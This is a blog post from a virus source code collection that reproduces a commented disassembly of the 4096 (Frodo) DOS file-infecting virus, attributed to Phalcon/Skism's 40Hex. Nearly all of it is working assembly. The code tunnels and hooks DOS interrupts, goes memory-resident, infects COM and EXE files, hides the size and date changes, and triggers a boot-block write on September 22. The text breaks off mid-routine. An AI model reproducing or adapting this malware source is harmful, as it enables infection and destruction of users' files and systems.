Sunday, April 27, 2008

VIRUS CODE DATABASE :: 4096a.asm -NO.10

Virus Source Code Database :: 4096a.asm

_4096 segment byte public
assume cs:_4096, ds:_4096

; 4096 Virus
; Disassembly done by Dark Angel of Phalcon/Skism for 40Hex Issue #9
; Assemble with TASM; the resultant file size is 4081 bytes

org 0
db 0
jmp installvirus
oldheader: ; original 1Ch bytes of the carrier file
db 75h,02,44h,15h,46h,20h
db 'Copyright Bourb%}i, I'
EXEflag db 00h
db 0FEh, 3Ah

int1: ; locate the BIOS or DOS entry point for int 13h and int 21h
push bp ; set up stack frame
mov bp,sp
push ax
cmp word ptr [bp+4],0C000h ; in BIOS?
jnb foundorigint ; nope, haven't found it
mov ax,cs:DOSsegment ; in DOS?
cmp [bp+4],ax
jbe foundorigint
pop ax
pop bp
cmp byte ptr cs:tracemode,1
jz tracemode1
mov ax,[bp+4] ; save segment of entry point
mov word ptr cs:origints+2,ax
mov ax,[bp+2] ; save offset of entry point
mov word ptr cs:origints,ax
jb finishint1
pop ax
pop bp
mov ss,cs:savess ; restore the stack to its
mov sp,cs:savesp ; original state
mov al,cs:saveIMR ; Restore IMR
out 21h,al ; (enable interrupts)
jmp setvirusints
and word ptr [bp+6],0FEFFh ; turn off trap flag
mov al,cs:saveIMR ; and restore IMR
out 21h,al
jmp short exitint1
dec byte ptr cs:instructionstotrace
jnz exitint1
and word ptr [bp+6],0FEFFh ; turn off trap flag
call saveregs
call swapvirint21 ; restore original int
lds dx,dword ptr cs:oldint1 ; 21h & int 1 handlers
mov al,1
call setvect
call restoreregs
jmp short finishint1

push ds
push si
xor si,si ; clear si
mov ds,si ; ds->interrupt table
xor ah,ah ; cbw would be better!?
mov si,ax
shl si,1 ; convert int # to offset in
shl si,1 ; interrupt table (int # x 4)
mov bx,[si] ; es:bx = interrupt vector
mov es,[si+2] ; get old interrupt vector
; save 3 bytes if use les bx,[si]
pop si
pop ds

mov word ptr cs:stackptr,offset topstack
mov cs:initialax,ax ; save initial value for ax
mov ah,30h ; Get DOS version
int 21h

mov cs:DOSversion,al ; Save DOS version
mov cs:carrierPSP,ds ; Save PSP segment
mov ah,52h ; Get list of lists
int 21h

mov ax,es:[bx-2] ; segment of first MCB
mov cs:DOSsegment,ax ; save it for use in int 1
mov es,ax ; es = segment first MCB
mov ax,es:[1] ; Get owner of first MCB
mov cs:ownerfirstMCB,ax ; save it
push cs
pop ds
mov al,1 ; get single step vector
call getint
mov word ptr ds:oldint1,bx ; save it for later
mov word ptr ds:oldint1+2,es; restoration
mov al,21h ; get int 21h vector
call getint
mov word ptr ds:origints,bx
mov word ptr ds:origints+2,es
mov byte ptr ds:tracemode,0 ; regular trace mode on
mov dx,offset int1 ; set new int 1 handler
mov al,1
call setvect
pop ax
or ax,100h ; turn on trap flag
push ax
in al,21h ; Get old IMR
mov ds:saveIMR,al
mov al,0FFh ; disable all interrupts
out 21h,al
mov ah,52h ; Get list of lists
pushf ; (for tracing purposes)
call dword ptr ds:origints ; perform the tunnelling
pop ax
and ax,0FEFFh ; turn off trap flag
push ax
mov al,ds:saveIMR ; reenable interrupts
out 21h,al
push ds
lds dx,dword ptr ds:oldint1
mov al,1 ; restore int 1 to the
call setvect ; original handler
pop ds
les di,dword ptr ds:origints; set up int 21h handlers
mov word ptr ds:oldint21,di
mov word ptr ds:oldint21+2,es
mov byte ptr ds:jmpfarptr,0EAh ; jmp far ptr
mov word ptr ds:int21store,offset otherint21
mov word ptr ds:int21store+2,cs
call swapvirint21 ; activate virus in memory
mov ax,4B00h
mov ds:checkres,ah ; set resident flag to a
; dummy value
mov dx,offset EXEflag+1 ; save EXE flag
push word ptr ds:EXEflag
int 21h ; installation check
; returns checkres=0 if
; installed

pop word ptr ds:EXEflag ; restore EXE flag
add word ptr es:[di-4],9
nop ; !?
mov es,ds:carrierPSP ; restore ES and DS to their
mov ds,ds:carrierPSP ; original values
sub word ptr ds:[2],(topstack/10h)+1
; alter top of memory in PSP
mov bp,ds:[2] ; get segment
mov dx,ds
sub bp,dx
mov ah,4Ah ; Find total available memory
mov bx,0FFFFh
int 21h

mov ah,4Ah ; Allocate all available memory
int 21h

dec dx ; go to MCB of virus memory
mov ds,dx
cmp byte ptr ds:[0],'Z' ; is it the last block?
je carrierislastMCB
dec byte ptr cs:checkres ; mark need to install virus
cmp byte ptr cs:checkres,0 ; need to install?
je playwithMCBs ; nope, go play with MCBs
mov byte ptr ds:[0],'M' ; mark not end of chain
mov ax,ds:[3] ; get memory size controlled
mov bx,ax ; by the MCB
sub ax,(topstack/10h)+1 ; calculate new size
add dx,ax ; find high memory segment
mov ds:[3],ax ; put new size in MCB
inc dx ; one more for the MCB
mov es,dx ; es->high memory MCB
mov byte ptr es:[0],'Z' ; mark end of chain
push word ptr cs:ownerfirstMCB ; get DOS PSP ID
pop word ptr es:[1] ; make it the owner
mov word ptr es:[3],160h ; fill in the size field
inc dx
mov es,dx ; es->high memory area
push cs
pop ds
mov cx,(topstack/2) ; zopy 0-1600h to high memory
mov si,offset topstack-2
mov di,si
std ; zopy backwards
rep movsw
push es ; set up stack for jmp into
mov ax,offset highentry ; virus code in high memory
push ax
mov es,cs:carrierPSP ; save current PSP segment
mov ah,4Ah ; Alter memory allocation
mov bx,bp ; bx = paragraphs
int 21h
retf ; jmp to virus code in high
highentry: ; memory
call swapvirint21
mov word ptr cs:int21store+2,cs
call swapvirint21
push cs
pop ds
mov byte ptr ds:handlesleft,14h ; reset free handles count
push cs
pop es
mov di,offset handletable
mov cx,14h
xor ax,ax ; clear handle table
rep stosw
mov ds:hideclustercountchange,al ; clear the flag
mov ax,ds:carrierPSP
mov es,ax ; es->PSP
lds dx,dword ptr es:[0Ah] ; get terminate vector (why?)
mov ds,ax ; ds->PSP
add ax,10h ; adjust for PSP
add word ptr cs:oldheader+16h,ax ; adjust jmp location
cmp byte ptr cs:EXEflag,0 ; for PSP
jne returntoEXE
mov ax,word ptr cs:oldheader; restore first 6 bytes of the
mov ds:[100h],ax ; COM file
mov ax,word ptr cs:oldheader+2
mov ds:[102h],ax
mov ax,word ptr cs:oldheader+4
mov ds:[104h],ax
push word ptr cs:carrierPSP ; Segment of carrier file's
mov ax,100h ; PSP
push ax
mov ax,cs:initialax ; restore orig. value of ax
retf ; return to original COM file

add word ptr cs:oldheader+0eh,ax
mov ax,cs:initialax ; Restore ax
mov ss,word ptr cs:oldheader+0eh ; Restore stack to
mov sp,word ptr cs:oldheader+10h ; original value
jmp dword ptr cs:oldheader+14h ; jmp to original cs:IP
; entry point
cmp sp,100h ; COM file?
ja dont_resetstack ; if so, skip this
xor sp,sp ; new stack
mov bp,ax
call next ; calculate relativeness
pop cx
sub cx,offset next ; cx = delta offset
mov ax,cs ; ax = segment
mov bx,10h ; convert to offset
mul bx
add ax,cx
adc dx,0
div bx ; convert to seg:off
push ax ; set up stack for jmp
mov ax,offset installvirus ; to installvirus
push ax
mov ax,bp
retf ; go to installvirus

db 30h ; get DOS version
dw offset getDOSversion
db 23h ; FCB get file size
dw offset FCBgetfilesize
db 37h ; get device info
dw offset get_device_info
db 4Bh ; execute
dw offset execute
db 3Ch ; create file w/ handle
dw offset createhandle
db 3Dh ; open file
dw offset openhandle
db 3Eh ; close file
dw offset handleclosefile
db 0Fh ; FCB open file
dw offset FCBopenfile
db 14h ; sequential FCB read
dw offset sequentialFCBread
db 21h ; random FCB read
dw offset randomFCBread
db 27h ; random FCB block read
dw offset randomFCBblockread
db 11h ; FCB find first
dw offset FCBfindfirstnext
db 12h ; FCB find next
dw offset FCBfindfirstnext
db 4Eh ; filename find first
dw offset filenamefindfirstnext
db 4Fh ; filename find next
dw offset filenamefindfirstnext
db 3Fh ; read
dw offset handleread
db 40h ; write
dw offset handlewrite
db 42h ; move file pointer
dw offset handlemovefilepointer
db 57h ; get/set file time/date
dw offset getsetfiletimedate
db 48h ; allocate memory
dw offset allocatememory

cmp ax,4B00h ; execute?
jnz notexecute
mov cs:checkres,al ; clear the resident flag
push bp ; set up stack frame
mov bp,sp
push [bp+6] ; push old flags
pop cs:int21flags ; and put in variable
pop bp ; why?
push bp ; why?
mov bp,sp ; set up new stack frame
call saveregs
call swapvirint21 ; reenable DOS int 21h handler
call disableBREAK
call restoreregs
call _pushall
push bx
mov bx,offset int21commands ; bx->command table
cmp ah,cs:[bx] ; scan for the function
jne findnextcommand ; code/subroutine combination
mov bx,cs:[bx+1]
xchg bx,[bp-14h]
add bx,3 ; go to next command
cmp bx,offset endcommands ; in the table until
jb scanforcommand ; there are no more
pop bx
call restoreBREAK
in al,21h ; save IMR
mov cs:saveIMR,al
mov al,0FFh ; disable all interrupts
out 21h,al
mov byte ptr cs:instructionstotrace,4 ; trace into
mov byte ptr cs:tracemode,1 ; oldint21
call replaceint1 ; set virus int 1 handler
call _popall
push ax
mov ax,cs:int21flags ; get the flags
or ax,100h ; turn on the trap flag
push ax ; and set it in motion
pop ax
pop bp
jmp dword ptr cs:oldint21 ; chain back to original int
; 21h handler -- do not return

call saveregs
call restoreBREAK
call swapvirint21
call restoreregs
pop bp
push bp ; set up stack frame
mov bp,sp
push word ptr cs:int21flags ; get the flags and put
pop word ptr [bp+6] ; them on the stack for
pop bp ; the iret

call _popall
call callint21
or al,al ; Found any files?
jnz exitint21 ; guess not
call _pushall
call getdisktransferaddress
mov al,0
cmp byte ptr [bx],0FFh ; Extended FCB?
jne findfirstnextnoextendedFCB
mov al,[bx+6]
add bx,7 ; convert to normal FCB
and cs:hide_size,al
test byte ptr [bx+1Ah],80h ; check year bit for virus
jz _popall_then_exitint21 ; infection tag. exit if so
sub byte ptr [bx+1Ah],0C8h ; alter file date
cmp byte ptr cs:hide_size,0
jne _popall_then_exitint21
sub word ptr [bx+1Dh],1000h ; hide file size
sbb word ptr [bx+1Fh],0
call _popall
jmp short exitint21

call _popall
call callint21 ; chain to original int 21h
call _pushall
or al,al ; 0 = success
jnz _popall_then_exitint21
mov bx,dx
test byte ptr [bx+15h],80h ; check if infected yet
jz _popall_then_exitint21
sub byte ptr [bx+15h],0C8h ; restore date
sub word ptr [bx+10h],1000h ; and hide file size
sbb byte ptr [bx+12h],0
jmp short _popall_then_exitint21

jcxz go_exitotherint21 ; reading any blocks?

mov bx,dx
mov si,[bx+21h] ; check if reading first
or si,[bx+23h] ; bytes
jnz go_exitotherint21
jmp short continueFCBread

mov bx,dx
mov ax,[bx+0Ch] ; check if reading first
or al,[bx+20h] ; bytes
jnz go_exitotherint21
call checkFCBokinfect
jnc continuecontinueFCBread
jmp exitotherint21
call _popall
call _pushall
call callint21 ; chain to original handler
mov [bp-4],ax ; set the return codes
mov [bp-8],cx ; properly
push ds ; save FCB pointer
push dx
call getdisktransferaddress
cmp word ptr [bx+14h],1 ; check for EXE infection
je FCBreadinfectedfile ; (IP = 1)
mov ax,[bx] ; check for COM infection
add ax,[bx+2] ; (checksum = 0)
add ax,[bx+4]
jz FCBreadinfectedfile
add sp,4 ; no infection, no stealth
jmp short _popall_then_exitint21 ; needed
pop dx ; restore address of the FCB
pop ds
mov si,dx
push cs
pop es
mov di,offset tempFCB ; copy FCB to temporary one
mov cx,25h
rep movsb
mov di,offset tempFCB
push cs
pop ds
mov ax,[di+10h] ; get old file size
mov dx,[di+12h]
add ax,100Fh ; increase by virus size
adc dx,0 ; and round to the nearest
and ax,0FFF0h ; paragraph
mov [di+10h],ax ; insert new file size
mov [di+12h],dx
sub ax,0FFCh
sbb dx,0
mov [di+21h],ax ; set new random record #
mov [di+23h],dx
mov word ptr [di+0Eh],1 ; record size = 1
mov cx,1Ch
mov dx,di
mov ah,27h ; random block read 1Ch bytes
call callint21
jmp _popall_then_exitint21

push cs
pop es
mov si,dx
mov di,offset tempFCB ; copy FCB to temp buffer
mov cx,0025h
repz movsb
push ds
push dx
push cs
pop ds
mov dx,offset tempFCB
mov ah,0Fh ; FCB open file
call callint21
mov ah,10h ; FCB close file
call callint21
test byte ptr [tempFCB+15h],80h ; check date bit
pop si
pop ds
jz will_exitotherint21 ; exit if not infected
les bx,dword ptr cs:[tempFCB+10h] ; get filesize
mov ax,es
sub bx,1000h ; hide increase
sbb ax,0
xor dx,dx
mov cx,word ptr cs:[tempFCB+0eh] ; get record size
dec cx
add bx,cx
adc ax,0
inc cx
div cx
mov [si+23h],ax ; fix random access record #
xchg dx,ax
xchg bx,ax
div cx
mov [si+21h],ax ; fix random access record #
jmp _popall_then_exitint21

and word ptr cs:int21flags,-2 ; turn off trap flag
call _popall
call callint21
call _pushall
jnb filenamefffnOK ; continue if a file is found
or word ptr cs:int21flags,1
jmp _popall_then_exitint21

call getdisktransferaddress
test byte ptr [bx+19h],80h ; Check high bit of date
jnz filenamefffnfileinfected; Bit set if infected
jmp _popall_then_exitint21
sub word ptr [bx+1Ah],1000h ; hide file length increase
sbb word ptr [bx+1Ch],0
sub byte ptr [bx+19h],0C8h ; and date change
jmp _popall_then_exitint21

push cx
and cx,7 ; mask the attributes
cmp cx,7 ; r/o, hidden, & system?
je exit_create_handle
pop cx
call replaceint13and24
call callint21 ; chain to original int 21h
call restoreint13and24
cmp byte ptr cs:errorflag,0 ; check if any errors yet
je no_errors_createhandle
jmp exitotherint21
jc other_error_createhandle; exit on error
mov bx,ax ; move handle to bx
mov ah,3Eh ; Close file
call callint21
jmp short openhandle
or byte ptr cs:int21flags,1; turn on the trap flag
mov [bp-4],ax ; set the return code properly
jmp _popall_then_exitint21
pop cx
jmp exitotherint21

call getcurrentPSP
call checkdsdxokinfect
jc jmp_exitotherint21
cmp byte ptr cs:handlesleft,0 ; make sure there is a free
je jmp_exitotherint21 ; entry in the table
call setup_infection ; open the file
cmp bx,0FFFFh ; error?
je jmp_exitotherint21 ; if so, exit
dec byte ptr cs:handlesleft
push cs
pop es
mov di,offset handletable
mov cx,14h
xor ax,ax ; find end of the table
repne scasw
mov ax,cs:currentPSP ; put the PSP value and the
mov es:[di-2],ax ; handle # in the table
mov es:[di+26h],bx
mov [bp-4],bx ; put handle # in return code
and byte ptr cs:int21flags,0FEh ; turn off the trap flag
jmp _popall_then_exitint21
jmp exitotherint21

push cs
pop es
call getcurrentPSP
mov di,offset handletable
mov cx,14h ; 14h entries max
mov ax,cs:currentPSP ; search for calling PSP
repne scasw
jnz handlenotfound ; handle not trapped
cmp bx,es:[di+26h] ; does the handle correspond?
jne scanhandle_close ; if not, find another handle
mov word ptr es:[di-2],0 ; otherwise, clear handle
call infect_file
inc byte ptr cs:handlesleft ; fix handles left counter
jmp short handleopenclose_exit ; and exit
jmp exitotherint21

push es
mov ah,2Fh ; Get disk transfer address
call callint21 ; to es:bx
push es
pop ds ; mov to ds:bx
pop es
or al,al ; load and execute?
jz loadexecute ; yepper!
jmp checkloadnoexecute ; otherwise check if
; load/no execute
push ds ; save filename
push dx
mov word ptr cs:parmblock,bx; save parameter block and
mov word ptr cs:parmblock+2,es; move to ds:si
lds si,dword ptr cs:parmblock
mov di,offset copyparmblock ; copy the parameter block
mov cx,0Eh
push cs
pop es
rep movsb
pop si ; copy the filename
pop ds ; to the buffer
mov di,offset copyfilename
mov cx,50h
rep movsb
mov bx,0FFFFh
call allocate_memory ; allocate available memory
call _popall
pop bp ; save the parameters
pop word ptr cs:saveoffset ; on the stack
pop word ptr cs:savesegment
pop word ptr cs:int21flags
mov ax,4B01h ; load/no execute
push cs ; ds:dx -> file name
pop es ; es:bx -> parameter block
mov bx,offset copyparmblock
pushf ; perform interrupt 21h
call dword ptr cs:oldint21
jnc continue_loadexecute ; continue if no error
or word ptr cs:int21flags,1; turn on trap flag
push word ptr cs:int21flags ; if error
push word ptr cs:savesegment ; restore stack
push word ptr cs:saveoffset
push bp ; restore the stack frame
mov bp,sp ; and restore ES:BX to
les bx,dword ptr cs:parmblock ; point to the parameter
jmp exitint21 ; block
call getcurrentPSP
push cs
pop es
mov di,offset handletable ; scan the handle table
mov cx,14h ; for the current PSP's
scanhandle_loadexecute: ; handles
mov ax,cs:currentPSP
repne scasw
jnz loadexecute_checkEXE
mov word ptr es:[di-2],0 ; clear entry in handle table
inc byte ptr cs:handlesleft ; fix handlesleft counter
jmp short scanhandle_loadexecute
lds si,dword ptr cs:origcsip
cmp si,1 ; Check if EXE infected
jne loadexecute_checkCOM
mov dx,word ptr ds:oldheader+16h ; get initial CS
add dx,10h ; adjust for PSP
mov ah,51h ; Get current PSP segment
call callint21
add dx,bx ;adjust for start load segment
mov word ptr cs:origcsip+2,dx
push word ptr ds:oldheader+14h ; save old IP
pop word ptr cs:origcsip
add bx,10h ; adjust for the PSP
add bx,word ptr ds:oldheader+0Eh ; add old SS
mov cs:origss,bx
push word ptr ds:oldheader+10h ; old SP
pop word ptr cs:origsp
jmp short perform_loadexecute
mov ax,[si] ; Check if COM infected
add ax,[si+2]
add ax,[si+4]
jz loadexecute_doCOM ; exit if already infected
push cs ; otherwise check to see
pop ds ; if it is suitable for
mov dx,offset copyfilename ; infection
call checkdsdxokinfect
call setup_infection
inc byte ptr cs:hideclustercountchange
call infect_file ; infect the file
dec byte ptr cs:hideclustercountchange
mov ah,51h ; Get current PSP segment
call callint21
call saveregs
call restoreBREAK
call swapvirint21
call restoreregs
mov ds,bx ; ds = current PSP segment
mov es,bx ; es = current PSP segment
push word ptr cs:int21flags ; restore stack parameters
push word ptr cs:savesegment
push word ptr cs:saveoffset
pop word ptr ds:[0Ah] ; Set terminate address in PSP
pop word ptr ds:[0Ch] ; to return address found on
; the stack
; (int 21h caller CS:IP)
push ds
lds dx,dword ptr ds:[0Ah] ; Get terminate address in PSP
mov al,22h ; Set terminate address to it
call setvect
pop ds
pop ax
mov ss,cs:origss ; restore the stack
mov sp,cs:origsp ; and
jmp dword ptr cs:origcsip ; perform the execute

mov bx,[si+1] ; restore original COM file
mov ax,word ptr ds:[bx+si-261h]
mov [si],ax
mov ax,word ptr ds:[bx+si-25Fh]
mov [si+2],ax
mov ax,word ptr ds:[bx+si-25Dh]
mov [si+4],ax
jmp short perform_loadexecute
cmp al,1
je loadnoexecute
jmp exitotherint21
or word ptr cs:int21flags,1; turn on trap flag
mov word ptr cs:parmblock,bx; save pointer to parameter
mov word ptr cs:parmblock+2,es ; block
call _popall
call callint21 ; chain to int 21h
call _pushall
les bx,dword ptr cs:parmblock ; restore pointer to
; parameter block
lds si,dword ptr es:[bx+12h]; get cs:ip on execute return
jc exit_loadnoexecute
and byte ptr cs:int21flags,0FEh ; turn off trap flag
cmp si,1 ; check for EXE infection
je loadnoexecute_EXE_already_infected
; infected if initial IP = 1
mov ax,[si] ; check for COM infection
add ax,[si+2] ; infected if checksum = 0
add ax,[si+4]
jnz perform_the_execute
mov bx,[si+1] ; get jmp location
mov ax,ds:[bx+si-261h] ; restore original COM file
mov [si],ax
mov ax,ds:[bx+si-25Fh]
mov [si+2],ax
mov ax,ds:[bx+si-25Dh]
mov [si+4],ax
jmp short perform_the_execute
mov dx,word ptr ds:oldheader+16h ; get entry CS:IP
call getcurrentPSP
mov cx,cs:currentPSP
add cx,10h ; adjust for PSP
add dx,cx
mov es:[bx+14h],dx ; alter the entry point CS
mov ax,word ptr ds:oldheader+14h
mov es:[bx+12h],ax
mov ax,word ptr ds:oldheader+0Eh ; alter stack
add ax,cx
mov es:[bx+10h],ax
mov ax,word ptr ds:oldheader+10h
mov es:[bx+0Eh],ax
call getcurrentPSP
mov ds,cs:currentPSP
mov ax,[bp+2] ; restore length as held in
mov word ptr ds:oldheader+6,ax
mov ax,[bp+4] ; the EXE header
mov word ptr ds:oldheader+8,ax
jmp _popall_then_exitint21

mov byte ptr cs:hide_size,0
mov ah,2Ah ; Get date
call callint21
cmp dx,916h ; September 22?
jb exitDOSversion ; leave if not
call writebootblock ; this is broken
jmp exitotherint21

call replaceint13and24
call findnextparagraphboundary
mov byte ptr ds:EXEflag,1 ; assume is an EXE file
cmp word ptr ds:readbuffer,'ZM' ; check here for regular
je clearlyisanEXE ; EXE header
cmp word ptr ds:readbuffer,'MZ' ; check here for alternate
je clearlyisanEXE ; EXE header
dec byte ptr ds:EXEflag ; if neither, assume is a
jz try_infect_com ; COM file
mov ax,ds:lengthinpages ; get file size in pages
shl cx,1 ; and convert it to
mul cx ; bytes
add ax,200h ; add 512 bytes
cmp ax,si
jb go_exit_infect_file
mov ax,ds:minmemory ; make sure min and max memory
or ax,ds:maxmemory ; are not both zero
jz go_exit_infect_file
mov ax,ds:filesizelow ; get filesize in dx:ax
mov dx,ds:filesizehigh
mov cx,200h ; convert to pages
div cx
or dx,dx ; filesize multiple of 512?
jz filesizemultiple512 ; then don't increm

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